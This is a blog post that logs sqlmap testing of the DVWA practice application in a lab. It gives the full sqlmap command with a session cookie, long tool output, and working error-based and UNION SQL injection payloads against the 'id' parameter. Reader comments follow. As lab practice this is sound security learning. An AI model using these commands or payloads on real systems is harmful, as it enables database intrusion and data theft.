[04:44:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:44:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:44:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:44:12] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:44:20] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:44:27] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:44:34] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:44:41] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:44:47] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:44:54] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:45:01] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:45:08] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:45:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:45:23] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:45:31] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:45:38] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:45:45] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:45:52] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:45:58] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:46:05] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:46:12] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:46:19] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:46:26] [WARNING] GET parameter 'id' is not injectable
[04:46:26] [WARNING] GET parameter 'Submit' appears to be not dynamic
[04:46:26] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[04:46:26] [INFO] testing for SQL injection on GET parameter 'Submit'
[04:46:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:46:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:46:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:46:32] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:46:34] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:46:34] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:46:34] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:46:34] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:46:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:46:34] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:46:34] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:46:34] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:46:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:46:34] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:46:34] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:46:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:46:37] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:46:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:46:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:46:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:46:39] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:46:39] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:46:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:46:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:46:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:46:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:46:49] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:46:57] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:47:04] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:47:11] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:47:17] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:47:24] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:47:31] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:47:37] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:47:44] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:47:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:47:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:48:07] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:48:13] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:48:20] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:48:27] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:48:34] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:48:40] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:48:47] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:48:54] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:49:01] [WARNING] GET parameter 'Submit' is not injectable
[04:49:01] [WARNING] User-Agent parameter 'User-Agent' appears to be not dynamic
[04:49:01] [WARNING] heuristic test shows that User-Agent parameter 'User-Agent' might not be injectable
[04:49:01] [INFO] testing for SQL injection on User-Agent parameter 'User-Agent'
[04:49:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:49:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:49:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:49:07] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:49:09] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:49:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:49:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:49:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:49:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:49:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:49:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:49:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:49:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:49:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:49:09] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:49:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:49:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:49:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:49:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:49:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:49:14] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:49:14] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:49:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:49:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:49:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:49:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:49:24] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:49:32] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:49:39] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:49:46] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:49:53] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:49:59] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:50:05] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:50:12] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:50:18] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:50:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:50:32] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:50:40] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:50:47] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:50:53] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:51:00] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:51:07] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:51:13] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:51:20] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:51:26] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:51:33] [WARNING] User-Agent parameter 'User-Agent' is not injectable
[04:51:33] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at 04:51:33

Manual injection
The strange thing is it said “id” is not injectable…but I could actually do the injection manually…

Update
Thanks Darren Martyn! 🙂

Either use burpsuite or tamper data to intercept the http traffic. For my case I use tamper data, use the GET request and you will find that variable “id” is injectable.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.12/vulnerabilities/sqli/?id=a&Submit=Submit" --cookie="PHPSESSID=hb25vpdh4q46lpl54f8b4fs755; security=low" --dbms="mysql"

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:14:04

[15:14:05] [INFO] testing connection to the target url
[15:14:05] [INFO] testing if the url is stable, wait a few seconds
[15:14:06] [INFO] url is stable
[15:14:06] [INFO] testing if GET parameter 'id' is dynamic
[15:14:06] [WARNING] GET parameter 'id' appears to be not dynamic
[15:14:06] [INFO] heuristics detected web page charset 'ascii'
[15:14:06] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[15:14:06] [INFO] testing for SQL injection on GET parameter 'id'
[15:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:14:06] [WARNING] reflective value(s) found and filtering out
[15:14:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:14:06] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[15:14:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:14:06] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:14:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:14:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[15:14:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:14:06] [INFO] target url appears to have 2 columns in query
[15:14:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
[15:19:05] [INFO] testing if GET parameter 'Submit' is dynamic
[15:19:05] [WARNING] GET parameter 'Submit' appears to be not dynamic
[15:19:05] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[15:19:05] [INFO] testing for SQL injection on GET parameter 'Submit'
[15:19:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:19:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:19:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:19:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:19:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 
[15:19:37] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=a' AND (SELECT 3525 FROM(SELECT COUNT(*),CONCAT(0x3a7063723a,(SELECT (CASE WHEN (3525=3525) THEN 1 ELSE 0 END)),0x3a7972703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ovgr'='ovgr&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7063723a,0x754b415379446f786474,0x3a7972703a), NULL#&Submit=Submit
---

[15:19:37] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[15:19:37] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/172.16.0.12'

[*] shutting down at 15:19:37

4 thoughts on “Test for sql injection”

netbiosX says:

October 28, 2012 at 4:25 am

Nice job cyrus!

1. cyruslab says:
  
  October 30, 2012 at 3:21 pm
  
  thanks! For the encouragement 😀
  
Darren Martyn says:

October 28, 2012 at 6:32 am

You need to specify a cookie with DVWA. Normally done by using BURP to get the cookie and passing it to SQLmap with –cookie=COOKIE 🙂

1. cyruslab says:
  
  October 30, 2012 at 3:23 pm
  
  Thanks for the tip! I have updated the post! 😀

Test for sql injection

Published by cyruslab

4 thoughts on “Test for sql injection”

Leave a Reply Cancel reply

Share this:

Like this:

Related

Published by cyruslab

4 thoughts on “Test for sql injection”

Leave a Reply Cancel reply